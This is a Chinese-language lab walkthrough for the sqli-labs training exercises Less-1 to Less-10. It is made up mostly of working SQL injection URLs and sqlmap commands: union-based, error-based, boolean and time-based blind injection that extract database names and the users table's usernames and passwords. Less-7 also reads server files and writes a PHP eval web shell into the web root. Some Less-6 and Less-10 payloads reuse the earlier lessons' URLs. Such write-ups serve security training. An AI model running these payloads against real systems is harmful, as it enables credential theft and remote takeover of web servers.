sqli-labs通关笔记(less1-less10)

注:使用PHPstudy时magic_quotes_gpc需要关闭

文章目录

  • less1-less4
    • 一、判断注入点
    • 二、利用
    • 三、sqlmap
    • 四、手注
      • Less-1
      • less-2
      • less-3
      • less-4
  • less5-less6
    • 一、介绍
    • 二、sqlmap
    • 三、手工
      • less-5
      • less-6
  • less-7
    • 一、预备知识
    • 二、手工
    • 三、sqlmap
  • less-8
    • 一、预备知识
      • 基于布尔的盲注
  • less-9
    • 一、预备知识
      • 基于时间的盲注
    • 二、手工
  • less-10

less1-less4

一、判断注入点

通过在URL中修改对应的ID值,为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠 \来探测URL中是否存在注入点。

二、利用

1、利用order by 判断字段数。

2、利用union select 联合查询,获取表名:
0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

3、利用union select 联合查询,获取字段名:
0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

4、利用union select 联合查询,获取字段值:
0' union select 1,group_concat(username,0x3a,password),3 from users--+

三、sqlmap

python2 sqlmap.py -u "http://43.247.91.228:84/Less-1/?id=1" --dbs --batch
python2 sqlmap.py -u "http://43.247.91.228:84/Less-1/?id=1" -D security --tables --batch
python2 sqlmap.py -u "http://43.247.91.228:84/Less-1/?id=1" -D security -T users --columns --batch
python2 sqlmap.py -u "http://43.247.91.228:84/Less-1/?id=1" -D security -T users -C 'username,password'  --dump  --batch

四、手注

Less-1

http://43.247.91.228:84/Less-1/?id=1'
//报错,说明大概率存在SQL注入漏洞
http://43.247.91.228:84/Less-1/?id=1' order by 3 --+    //正常
http://43.247.91.228:84/Less-1/?id=1' order by 4 --+    //报错
//字段数为3

//id=1改为一个数据库不存在的值,查看回显位
http://43.247.91.228:84/Less-1/?id=222' union select 1,2,3 --+

//回显位为23
http://43.247.91.228:84/Less-1/?id=222' union select 1,database(),user() --+

//知道数据库名称为security        用户名为root@localhost

爆库、表、列、内容四步曲:

//爆库:
http://43.247.91.228:84/Less-1/?id=222' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+



//爆表:
http://43.247.91.228:84/Less-1/?id=222' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+




//爆列:
http://43.247.91.228:84/Less-1/?id=222' union select 1,2, group_concat(column_name) from information_schema.columns where table_name='users' --+



//爆内容:
http://43.247.91.228:84/Less-1/?id=222' union select 1,2, group_concat(username,0x3a,password)  from users --+

//0x3a:0x是十六进制的标志,3a是十进制的58,是ascii中的':',用以分割password和username

less-2

和less-1基本一样 只不过这次是数字型,不需要’闭合,给出payload:

//爆库:
http://43.247.91.228:84/Less-2/?id=222 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
//爆表:
http://43.247.91.228:84/Less-2/?id=222 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
//爆列:
http://43.247.91.228:84/Less-2/?id=222 union select 1,2, group_concat(column_name) from information_schema.columns where table_name='users' --+
//爆内容:
http://43.247.91.228:84/Less-2/?id=222 union select 1,2, group_concat(username,0x3a,password)  from users --+

less-3

和上面基本一样,只不过这次id用单引号和小括号进行包裹。给出payload:

//爆库:
http://43.247.91.228:84/Less-3/?id=222') union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
//爆表:
http://43.247.91.228:84/Less-3/?id=222') union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
//爆列:
http://43.247.91.228:84/Less-3/?id=222') union select 1,2, group_concat(column_name) from information_schema.columns where table_name='users' --+
//爆内容:
http://43.247.91.228:84/Less-3/?id=222') union select 1,2, group_concat(username,0x3a,password)  from users --+

less-4

和上面基本一样,只不过id用双引号和小括号来包裹了。给出Payload:

//爆库:
http://43.247.91.228:84/Less-4/?id=222") union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
//爆表:
http://43.247.91.228:84/Less-4/?id=222") union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
//爆列名:
http://43.247.91.228:84/Less-4/?id=222") union select 1,2, group_concat(column_name) from information_schema.columns where table_name='users' --+
//爆内容:
http://43.247.91.228:84/Less-4/?id=222") union select 1,2, group_concat(username,0x3a,password)  from users --+
//:mysql在接受到1'))))类似这样的字符串的时候会进行隐形转换为1

less5-less6

一、介绍

报错注入形式上是两个嵌套的查询,即select …(select …),里面的那个select被称为子查询,他的执行顺序也是先执行子查询,然后再执行外面的select。
双注入主要涉及到了几个sql函数:
rand()随机函数,返回0~1之间的某个值
floor(a)取整函数,返回小于等于a,且值最接近a的一个整数
count()聚合函数也称作计数函数,返回查询对象的总数
group by clause分组语句,按照查询结果分组 通过报错来显示出具体的信息。

二、sqlmap

python2 sqlmap.py -u "http://43.247.91.228:84/Less-6/?id=1"
python2 sqlmap.py -u "http://43.247.91.228:84/Less-6/?id=1" --current-db
python2 sqlmap.py -u "http://43.247.91.228:84/Less-6/?id=1" -D security --tables --batch
python2 sqlmap.py -u "http://43.247.91.228:84/Less-6/?id=1" -D security -T users --columns --batch
python2 sqlmap.py -u "http://43.247.91.228:84/Less-6/?id=1" -D security -T users -C 'username,password'  --dump  --batch

三、手工

less-5

//爆库:
http://43.247.91.228:84/Less-5/?id=222' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

//爆表:
http://43.247.91.228:84/Less-5/?id=222' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
//0,1  1,1  2,1  3,1这样去遍历

//爆列:
http://43.247.91.228:84/Less-5/?id=222' union select 1,2,3 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

//爆字段:
http://43.247.91.228:84/Less-5/?id=222' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

//Limit函数使用0,1  1,1  2,1  3,1这样去遍历

less-6

与less-5差不多,知识需要双引号闭合

//爆库
http://43.247.91.228:84/Less-5/?id=222" union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

//爆表
http://43.247.91.228:84/Less-5/?id=222" union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
//0,1  1,1  2,1  3,1这样去遍历


//爆列
http://43.247.91.228:84/Less-5/?id=222" union select 1,2,3 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+


//爆字段
http://43.247.91.228:84/Less-5/?id=222" union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+



//Limit函数使用0,1  1,1  2,1  3,1这样去遍历

less-7

一、预备知识

mysql数据库在渗透过程中,除了读取数据之外,还可以进行对文件进行读写(前提是权限足够)

读取前提:
1.用户权限足够高,尽量具有root权限
2.secure_file_priv不为NULL

二、手工

我们在D盘新建一个flag.txt再对其进行读取
payload:

`http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,load_file("D:\\flag.txt"),3 --+`

向网站根目录写入一句话木马,用菜刀连接
payload:

http://127.0.0.1/sqli/Less-7/?id=-1')) union select 1,2,'<?php @eval($_POST["x"]);?>' into outfile"D:\\Work\\phpstudy\\PHPTutorial\\WWW\\sqli\\Less-7\\1.php" --+

三、sqlmap

//读文件payload:
python2 sqlmap.py -u "http://127.0.0.1/sqli/less-7/?id=1" --file-read "D:\\flag.txt"
//写文件payload:
python2 sqlmap.py -u "http://127.0.0.1/sqli/less-7/?id=1" --file-write "D:\\flag.txt" --file-dest D:\Work\phpstudy\PHPTutorial\WWW\sqli\Less-7 -v 2
//(存在权限问题,写入失败)

less-8

一、预备知识

基于布尔的盲注

方法一:使用left(database(),1)进行尝试

left(a,b)从左侧截取 a 的前 b 位

payload:

http://127.0.0.1/sqli/Less-8/?id=1' and  length(database()) = 8 --+ 
//正常显示,说明数据库名称的长度为8
http://127.0.0.1/sqli/Less-8/?id=1' and left(database(),1)>'a' --+
//看数据库名称的第一位的是否大于a,可以用二分法提高效率
http://127.0.0.1/sqli/Less-8/?id=1' and  left(database(),2)>'se' --+
//同理这个语句是看数据库名称的前两位是否大于se
最终可以得知数据库名为security

方法二:利用substr()和ascii()函数进行尝试

substr(a,b,c)从 b 位置开始,截取字符串 a 的 c 长度。Ascii()将某个字符转换为 ascii 值.

mid(a,b,c)从位置 b 开始,截取 a 字符串的 c 位 Ord()函数同 ascii(),将字符转为 ascii 值
limit m,n 其中m表示记录开始的索引,是从0开始的 limit 2,4 表示取出第三条到第六条一共四条的记录

payload:

猜数据库名:
http://127.0.0.1/sqli/Less-8/?id=1'  and ascii(mid(database(),1,1))=115--+

猜表名:
http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=114 --+

http://127.0.0.1/sqli/Less-8/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 2,1),1,1))=117--+

猜列名:
http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105--+

http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105--+


猜内容:
http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr((select username from security.users order by id limit 0,1),1,1))>67--+

http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr((select username from security.users order by id limit 1,1),1,1))=65--+

//注:若要猜解密码,则将users改为password即可。

less-9

一、预备知识

基于时间的盲注

利用sleep()函数。正确的时候直接返回,错误的时候等待五秒。

二、手工

payload:

猜数据库名:
http://127.0.0.1/sqli/Less-9/?id=1' and if(ascii(substr(database(),1,1))=115,1,sleep(5)) --+


猜表名:
http://127.0.0.1/sqli/Less-9/?id=1' and If(ascii(substr((select table_name from information_s
chema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+


猜列名:
http://127.0.0.1/sqli/Less-9/?id=1' and If(ascii(substr((select column_name from information
_schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))--+

猜内容:
http://127.0.0.1/sqli/Less-9/?id=1' and If(ascii(substr((select username from users limit 0,1),
1,1))=68,1,sleep(5))--+

less-10

与less-9基本相同,不同的只是闭合方式改成了""
payload:

猜数据库名:
http://127.0.0.1/sqli/Less-9/?id=1" and if(ascii(substr(database(),1,1))=115,1,sleep(5)) --+

猜表名:
http://127.0.0.1/sqli/Less-9/?id=1" and If(ascii(substr((select table_name from information_s
chema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+

猜列名:
http://127.0.0.1/sqli/Less-9/?id=1" and If(ascii(substr((select column_name from information
_schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))--+

猜内容:
http://127.0.0.1/sqli/Less-9/?id=1" and If(ascii(substr((select username from users limit 0,1),
1,1))=68,1,sleep(5))--+

你可能感兴趣的:(sql注入)